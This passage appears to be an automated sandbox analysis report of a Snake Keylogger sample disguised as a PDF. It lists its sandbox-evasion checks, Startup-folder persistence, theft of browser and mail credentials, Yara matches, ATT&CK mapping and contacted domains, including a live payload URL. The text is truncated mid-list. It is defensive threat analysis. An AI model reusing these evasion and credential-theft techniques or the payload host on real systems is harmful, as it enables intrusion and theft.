                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                Source: wscript.exe, 00000004.00000002.2207058200.00000208BC755000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\
                Source: wscript.exe, 00000004.00000002.2207058200.00000208BC755000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\/l
                Source: Current.exe, 00000005.00000002.2265233058.0000000002B86000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                Source: Current.exe, 00000005.00000002.2265233058.0000000002B86000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                Source: File07098.PDF.exe, 00000000.00000002.2089546543.0000000003476000.00000004.00000800.00020000.00000000.sdmp, File07098.PDF.exe, 00000000.00000002.2094031243.0000000005D00000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: jHgFs&7^{
                Source: File07098.PDF.exe, 00000000.00000002.2077497584.0000000000632000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4480522226.0000000000D49000.00000004.00000020.00020000.00000000.sdmp, Current.exe, 00000005.00000002.2262355304.0000000000CC2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: InstallUtil.exe, 00000006.00000002.4480573279.000000000068C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllC
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05F57B70 LdrInitializeThunk,6_2_05F57B70
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeMemory allocated: page read and write | page guardJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\Current.exe "C:\Users\user\AppData\Roaming\Current.exe" Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeQueries volume information: C:\Users\user\Desktop\File07098.PDF.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeQueries volume information: C:\Users\user\AppData\Roaming\Current.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 0.2.File07098.PDF.exe.33f9170.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.Current.exe.3ae9550.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.File07098.PDF.exe.33f9170.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.Current.exe.3ae9550.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.File07098.PDF.exe.33d9550.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.4483465030.0000000002639000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2265233058.0000000002F33000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2078600685.0000000002834000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2089546543.0000000003476000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2285828812.0000000003AE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4479810620.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2285828812.0000000003B66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2089546543.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4484950182.0000000002ECE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4483465030.0000000002471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4484950182.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: File07098.PDF.exe PID: 4124, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 2460, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Current.exe PID: 528, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6204, type: MEMORYSTR
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Yara matchFile source: 0.2.File07098.PDF.exe.33f9170.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.Current.exe.3ae9550.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.File07098.PDF.exe.33f9170.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.Current.exe.3ae9550.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.File07098.PDF.exe.33d9550.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.2265233058.0000000002F33000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2078600685.0000000002834000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2089546543.0000000003476000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2285828812.0000000003AE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4479810620.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2285828812.0000000003B66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2089546543.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: File07098.PDF.exe PID: 4124, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 2460, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Current.exe PID: 528, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6204, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 0.2.File07098.PDF.exe.33f9170.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.Current.exe.3ae9550.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.File07098.PDF.exe.33f9170.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.Current.exe.3ae9550.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.File07098.PDF.exe.33d9550.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.4483465030.0000000002639000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2265233058.0000000002F33000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2078600685.0000000002834000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2089546543.0000000003476000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2285828812.0000000003AE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4479810620.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2285828812.0000000003B66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2089546543.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4484950182.0000000002ECE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4483465030.0000000002471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4484950182.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: File07098.PDF.exe PID: 4124, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 2460, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Current.exe PID: 528, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6204, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information111
                Scripting                		Valid Accounts1
                Scheduled Task/Job                		111
                Scripting                		1
                DLL Side-Loading                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                File and Directory Discovery                		Remote Services11
                Archive Collected Data                		1
                Ingress Tool Transfer                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                DLL Side-Loading                		11
                Process Injection                		1
                Deobfuscate/Decode Files or Information                		LSASS Memory13
                System Information Discovery                		Remote Desktop Protocol1
                Data from Local System                		11
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAt1
                Scheduled Task/Job                		1
                Scheduled Task/Job                		12
                Obfuscated Files or Information                		Security Account Manager1
                Query Registry                		SMB/Windows Admin Shares1
                Email Collection                		2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCron2
                Registry Run Keys / Startup Folder                		2
                Registry Run Keys / Startup Folder                		2
                Software Packing                		NTDS21
                Security Software Discovery                		Distributed Component Object ModelInput Capture13
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading                		LSA Secrets1
                Process Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                Masquerading                		Cached Domain Credentials31
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                Virtualization/Sandbox Evasion                		DCSync1
                Application Window Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                Process Injection                		Proc Filesystem1
                System Network Configuration Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1545174 Sample: File07098.PDF.exe Startdate: 30/10/2024 Architecture: WINDOWS Score: 100 30 reallyfreegeoip.org 2->30 32 checkip.dyndns.org 2->32 34 2 other IPs or domains 2->34 50 Found malware configuration 2->50 52 Malicious sample detected (through community Yara rule) 2->52 54 Antivirus / Scanner detection for submitted sample 2->54 58 14 other signatures 2->58 8 File07098.PDF.exe 15 5 2->8         started        13 wscript.exe 1 2->13         started        signatures3 56 Tries to detect the country of the analysis system (by using the IP) 30->56 process4 dnsIp5 36 erkasera.com 188.132.193.46, 443, 49704, 49724 PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTR Turkey 8->36 24 C:\Users\user\AppData\Roaming\Current.exe, PE32 8->24 dropped 26 C:\Users\user\AppData\Roaming\...\Current.vbs, ASCII 8->26 dropped 28 C:\Users\user\...\Current.exe:Zone.Identifier, ASCII 8->28 dropped 64 Drops VBS files to the startup folder 8->64 66 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->66 15 InstallUtil.exe 14 2 8->15         started        68 Windows Scripting host queries suspicious COM object (likely to drop second stage) 13->68 19 Current.exe 14 2 13->19         started        file6 signatures7 process8 dnsIp9 38 reallyfreegeoip.org 188.114.96.3, 443, 49706, 49707 CLOUDFLARENETUS European Union 15->38 40 checkip.dyndns.com 193.122.130.0, 49705, 49708, 49710 ORACLE-BMC-31898US United States 15->40 42 Tries to steal Mail credentials (via file / registry access) 15->42 44 Antivirus detection for dropped file 19->44 46 Multi AV Scanner detection for dropped file 19->46 48 Machine Learning detection for dropped file 19->48 21 InstallUtil.exe 2 19->21         started        signatures10 process11 signatures12 60 Tries to steal Mail credentials (via file / registry access) 21->60 62 Tries to harvest and steal browser information (history, passwords, etc) 21->62

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                File07098.PDF.exe63%ReversingLabsByteCode-MSIL.Spyware.Snakekeylogger
                File07098.PDF.exe100%AviraHEUR/AGEN.1323701
                File07098.PDF.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\Current.exe100%AviraHEUR/AGEN.1323701
                C:\Users\user\AppData\Roaming\Current.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\Current.exe63%ReversingLabsByteCode-MSIL.Spyware.Snakekeylogger

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://checkip.dyndns.org/0%URL Reputationsafe
                https://stackoverflow.com/q/14436606/233540%URL Reputationsafe
                https://stackoverflow.com/q/11564914/23354;0%URL Reputationsafe
                https://stackoverflow.com/q/2152978/233540%URL Reputationsafe
                http://checkip.dyndns.org/q0%URL Reputationsafe
                http://reallyfreegeoip.org0%URL Reputationsafe
                https://reallyfreegeoip.org0%URL Reputationsafe
                http://checkip.dyndns.org0%URL Reputationsafe
                http://checkip.dyndns.com0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                https://reallyfreegeoip.org/xml/0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                erkasera.com
                		188.132.193.46
                		truefalse
                  		unknown
                  reallyfreegeoip.org
                  		188.114.96.3
                  		truetrue
                    		unknown
                    checkip.dyndns.com
                    		193.122.130.0
                    		truefalse
                      		unknown
                      checkip.dyndns.org
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://checkip.dyndns.org/false
                        • URL Reputation: safe
                        		unknown
                        https://erkasera.com/seuias/Mccudidikm.vdffalse
                          		unknown
                          https://reallyfreegeoip.org/xml/173.254.250.78false
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://reallyfreegeoip.org/xml/173.254.250.78$InstallUtil.exe, 00000002.00000002.4484950182.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002E69000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002E5C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002EC0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002EB2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002E84000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002E77000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.00000000025F0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.000000000262B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.0000000002577000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.000000000261D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.00000000025C7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.00000000025D4000.00000004.00000800.00020000.00000000.sdmpfalse
                              		unknown
                              https://erkasera.comFile07098.PDF.exe, 00000000.00000002.2078600685.00000000023D1000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000005.00000002.2265233058.0000000002AE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                		unknown
                                https://github.com/mgravell/protobuf-netiFile07098.PDF.exe, 00000000.00000002.2091778778.0000000004D30000.00000004.08000000.00040000.00000000.sdmpfalse
                                  		unknown
                                  https://stackoverflow.com/q/14436606/23354File07098.PDF.exe, 00000000.00000002.2091778778.0000000004D30000.00000004.08000000.00040000.00000000.sdmp, File07098.PDF.exe, 00000000.00000002.2078600685.0000000002476000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000005.00000002.2265233058.0000000002B86000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://github.com/mgravell/protobuf-netJFile07098.PDF.exe, 00000000.00000002.2091778778.0000000004D30000.00000004.08000000.00040000.00000000.sdmpfalse
                                    		unknown
                                    https://stackoverflow.com/q/11564914/23354;File07098.PDF.exe, 00000000.00000002.2091778778.0000000004D30000.00000004.08000000.00040000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://stackoverflow.com/q/2152978/23354File07098.PDF.exe, 00000000.00000002.2091778778.0000000004D30000.00000004.08000000.00040000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://checkip.dyndns.org/qFile07098.PDF.exe, 00000000.00000002.2089546543.0000000003476000.00000004.00000800.00020000.00000000.sdmp, File07098.PDF.exe, 00000000.00000002.2078600685.0000000002834000.00000004.00000800.00020000.00000000.sdmp, File07098.PDF.exe, 00000000.00000002.2089546543.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4479810620.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Current.exe, 00000005.00000002.2265233058.0000000002F33000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000005.00000002.2285828812.0000000003AE1000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000005.00000002.2285828812.0000000003B66000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://reallyfreegeoip.orgInstallUtil.exe, 00000002.00000002.4484950182.0000000002E69000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002E5C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002EC0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002EB2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002E84000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002E77000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.00000000025F0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.000000000254C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.000000000262B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.000000000261D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.00000000025C7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.00000000025D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://github.com/mgravell/protobuf-netFile07098.PDF.exe, 00000000.00000002.2091778778.0000000004D30000.00000004.08000000.00040000.00000000.sdmpfalse
                                      		unknown
                                      https://reallyfreegeoip.orgInstallUtil.exe, 00000002.00000002.4484950182.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002E69000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002E5C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002EC0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002DC8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002EB2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002E84000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002E77000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.0000000002534000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.00000000025F0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 